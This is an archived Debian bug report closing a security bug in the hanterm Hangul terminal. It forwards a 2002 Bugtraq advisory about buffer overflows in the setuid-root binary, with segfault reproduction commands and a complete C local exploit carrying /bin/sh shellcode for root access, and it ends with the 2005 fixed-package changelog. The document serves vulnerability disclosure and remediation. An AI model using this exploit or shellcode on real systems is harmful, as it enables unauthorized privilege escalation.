Your message dated Fri, 18 Mar 2005 01:02:14 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#133138: fixed in hanterm-xf 1:3.3.1p18-9
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 9 Feb 2002 20:58:44 +0000
>From [EMAIL PROTECTED] Sat Feb 09 14:58:44 2002
Return-path: <[EMAIL PROTECTED]>
Received: from smtp02.mrf.mail.rcn.net [207.172.4.61]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 16Zea4-0007wx-00; Sat, 09 Feb 2002 14:58:44 -0600
Received: from 209-6-22-177.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com
([209.6.22.177] helo=mizar.alcor.net)
by smtp02.mrf.mail.rcn.net with esmtp (Exim 3.33 #10)
id 16Zea4-0001Z2-00
for [EMAIL PROTECTED]; Sat, 09 Feb 2002 15:58:44 -0500
Received: from mdz by mizar.alcor.net with local (Exim 3.34 #1 (Debian))
id 16Zea0-0007Ks-00
for <[EMAIL PROTECTED]>; Sat, 09 Feb 2002 15:58:40 -0500
Date: Sat, 9 Feb 2002 15:58:40 -0500
From: Matt Zimmerman <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [EMAIL PROTECTED]: Overflow Vulnerabilities in hanterm]
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.27i
X-Debbugs-CC: [EMAIL PROTECTED]
Sender: Matt Zimmerman <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
Package: hanterm
Severity: grave
Tags: security potato woody sid
I was able to reproduce this segfault with hanterm 1:3.3.1p18-6 in unstable
and 1:3.3.1p17-5.1 in stable. I was not able to crash hanterm-classic
3.1.6rc2-3 in unstable.
----- Forwarded message from xperc <[EMAIL PROTECTED]> -----
Date: 7 Feb 2002 10:33:27 -0000
From: xperc <[EMAIL PROTECTED]>
To: bugtraq@securityfocus.com
Subject: Overflow Vulnerabilities in hanterm
Hi,I'm xperc.
hanterm is Hangul terminal for X. it is based on the
xterm in XFree86. The hanterm binary is default
installed with setuid root permissions for TurboLinux
Server 6.5. but contains insecure code with allows
unprivileged local users to obtain root access on the
local system.
$which hanterm
/usr/bin/X11/hanterm
$ls -l /usr/bin/X11/hanterm
-rws--x--x 1 root root 166100 03 13
2001 /usr/bin/X11/hanterm*
$rpm -qf /usr/bin/X11/hanterm
hanterm-xf-p18-3.3-6
$hanterm -fn `perl -e 'print "a"x100'`
Segmentation fault
$hanterm -hfb `perl -e 'print "a"x8000'`
Segmentation fault
$hanterm -hfn `perl -e 'print "a"x8000'`
Segmentation fault
...etc
/* hanterm_exp.c
*
* local exploit for hanterm
* .. tested in TurboLinux Server 6.5 (Japan)
*
* thanks my Japanese friend kaju(kaijyu)
* and Japanese hacker UNYUN.
*
* by [EMAIL PROTECTED]
* 2002/02/07
*/
#include <stdio.h>
#define NOP 0x90
#define MAXBUF 88
#define RETOFS 84
#define SHELL_OFS 22
#define ESP_OFS -0xe38
unsigned int get_esp()
{
__asm__("mov %esp,%eax");
}
int main()
{
static char shellcode[]={
0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
};
unsigned int retadr;
char buf[MAXBUF];
int i;
memset(buf,NOP,MAXBUF);
retadr=get_esp()+ESP_OFS;
printf("Jumping address = %p\n",retadr);
for(i=RETOFS-32;i<RETOFS+32;i+=4){
buf[i] =retadr&0xff;
buf[i+1]=(retadr>>8)&0xff;
buf[i+2]=(retadr>>16)&0xff;
buf[i+3]=(retadr>>24)&0xff;
}
strncpy(buf+SHELL_OFS,shellcode,strlen
(shellcode));
//buf[MAXBUF-1]='\0'; faint!:-(
execl("/usr/bin/X11/hanterm","hanterm","-
fn",buf,(char *)0);
}
----- End forwarded message -----
--
- mdz
---------------------------------------
Received: (at 133138-close) by bugs.debian.org; 18 Mar 2005 06:36:24 +0000
>From [EMAIL PROTECTED] Thu Mar 17 22:36:24 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DCB5r-0001cr-00; Thu, 17 Mar 2005 22:36:23 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1DCAYo-0006l1-00; Fri, 18 Mar 2005 01:02:14 -0500
From: Andrew Pollock <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#133138: fixed in hanterm-xf 1:3.3.1p18-9
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Fri, 18 Mar 2005 01:02:14 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
X-CrossAssassin-Score: 2
Source: hanterm-xf
Source-Version: 1:3.3.1p18-9
We believe that the bug you reported is fixed in the latest version of
hanterm-xf, which is due to be installed in the Debian FTP archive:
hanterm-xf_3.3.1p18-9.diff.gz
to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9.diff.gz
hanterm-xf_3.3.1p18-9.dsc
to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9.dsc
hanterm-xf_3.3.1p18-9_i386.deb
to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Andrew Pollock <[EMAIL PROTECTED]> (supplier of updated hanterm-xf package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Fri, 18 Mar 2005 16:37:26 +1100
Source: hanterm-xf
Binary: hanterm-xf
Architecture: source i386
Version: 1:3.3.1p18-9
Distribution: unstable
Urgency: low
Maintainer: Debian QA Group <[EMAIL PROTECTED]>
Changed-By: Andrew Pollock <[EMAIL PROTECTED]>
Description:
hanterm-xf - X terminal emulator with Hangul support
Closes: 118106 133138
Changes:
hanterm-xf (1:3.3.1p18-9) unstable; urgency=low
.
* QA Group upload orphaning this package
* Incorporates previous NMUs (closes: #133138, #118106)
* debian/hanterm-xf.menu: quoted Command:, Section: and Needs:
* debian/hanterm-xf.1x: changed 1X to 1x in .TH macro
* debian/control: version build-dependency on debhelper
Files:
b46a7ac2de89070747814d51fbab3ba8 639 x11 optional hanterm-xf_3.3.1p18-9.dsc
333fc460afda063afc5e3402b23bbb2c 10630 x11 optional
hanterm-xf_3.3.1p18-9.diff.gz
3c06c28d2c7af810ec068b03c7baf240 116504 x11 optional
hanterm-xf_3.3.1p18-9_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFCOmtZIblXXKfZFgIRAlQCAKDIyUROnM0lJXzLSl/EPu/Hb6N+dgCg1gLP
52Yc4podMt4ng+hDFuU6zGA=
=B7q1
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
